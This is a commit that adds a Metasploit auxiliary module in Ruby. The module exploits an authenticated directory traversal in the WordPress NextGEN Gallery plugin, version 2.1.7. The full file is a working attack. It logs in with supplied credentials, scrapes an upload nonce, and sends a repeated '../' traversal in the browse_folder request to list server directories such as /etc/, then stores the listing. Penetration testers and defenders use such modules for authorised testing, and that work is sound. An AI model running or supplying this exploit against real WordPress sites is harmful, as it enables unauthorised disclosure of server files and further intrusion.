Land #5913, Add WP NextGEN Gallery Directory Traversal Vuln

2015-09-02 00:01:35 -05:00 · 2015-09-02 00:01:35 -05:00 · 0c4b020089
parent 1aa7c596ce 626704079d
commit 0c4b020089
1 changed files with 152 additions and 0 deletions
--- a/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb
+++ b/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb
@ -0,0 +1,152 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'json'
+require 'nokogiri'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WordPress NextGEN Gallery Directory Read Vulnerability',
+      'Description'    => %q{
+        This module exploits an authenticated directory traversal vulnerability
+        in WordPress Plugin "NextGEN Gallery" version 2.1.7, allowing
+        to read arbitrary directories with the web server privileges.
+      },
+      'References'     =>
+        [
+          ['WPVDB', '8165'],
+          ['URL', 'http://permalink.gmane.org/gmane.comp.security.oss.general/17650']
+        ],
+      'Author'         =>
+        [
+          'Sathish Kumar', # Vulnerability Discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        OptString.new('WP_USER', [true, 'A valid username', nil]),
+        OptString.new('WP_PASS', [true, 'Valid password for the provided username', nil]),
+        OptString.new('DIRPATH', [true, 'The path to the directory to read', '/etc/']),
+        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ])
+      ], self.class)
+  end
+
+  def user
+    datastore['WP_USER']
+  end
+
+  def password
+    datastore['WP_PASS']
+  end
+
+  def check
+    check_plugin_version_from_readme('nextgen-gallery', '2.1.9')
+  end
+
+  def get_nonce(cookie)
+    res = send_request_cgi(
+      'uri'    => normalize_uri(wordpress_url_backend, 'admin.php'),
+      'method' => 'GET',
+      'vars_get'  => {
+        'page'    => 'ngg_addgallery'
+      },
+      'cookie' => cookie
+    )
+
+    if res && res.redirect? && res.redirection
+      location = res.redirection
+      print_status("#{peer} - Following redirect to #{location}")
+      res = send_request_cgi(
+        'uri'    => location,
+        'method' => 'GET',
+        'cookie' => cookie
+      )
+    end
+
+    res.body.scan(/var browse_params = {"nextgen_upload_image_sec":"(.+)"};/).flatten.first
+  end
+
+  def parse_paths(res)
+    begin
+      j = JSON.parse(res.body)
+    rescue JSON::ParserError => e
+      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
+      return []
+    end
+
+    html = j['html']
+    noko = Nokogiri::HTML(html)
+    links = noko.search('a')
+    links.collect { |e| normalize_uri("#{datastore['DIRPATH']}/#{e.text}") }
+  end
+
+  def run_host(ip)
+    vprint_status("#{peer} - Trying to login as: #{user}")
+    cookie = wordpress_login(user, password)
+    if cookie.nil?
+      print_error("#{peer} - Unable to login as: #{user}")
+      return
+    end
+
+    vprint_status("#{peer} - Trying to get nonce...")
+    nonce = get_nonce(cookie)
+    if nonce.nil?
+      print_error("#{peer} - Can not get nonce after login")
+      return
+    end
+    vprint_status("#{peer} - Got nonce: #{nonce}")
+
+    traversal = "../" * datastore['DEPTH']
+    filename = datastore['DIRPATH']
+    filename = filename[1, filename.length] if filename =~ /^\//
+
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path),
+      'headers'   => {
+        'Referer' => "http://#{rhost}/wordpress/wp-admin/admin.php?page=ngg_addgallery",
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'vars_get'  => {
+        'photocrati_ajax' => '1'
+      },
+      'vars_post' => {
+        'nextgen_upload_image_sec' => "#{nonce}",
+        'action' => 'browse_folder',
+        'dir' => "#{traversal}#{filename}"
+      },
+      'cookie'    => cookie
+    )
+
+    if res && res.code == 200
+
+      paths = parse_paths(res)
+      vprint_line(paths * "\n")
+
+      fname = datastore['DIRPATH']
+      path = store_loot(
+        'nextgen.traversal',
+        'text/plain',
+        ip,
+        paths * "\n",
+        fname
+      )
+
+      print_good("#{peer} - File saved in: #{path}")
+    else
+      print_error("#{peer} - Nothing was downloaded. You can try to change the DIRPATH.")
+    end
+  end
+end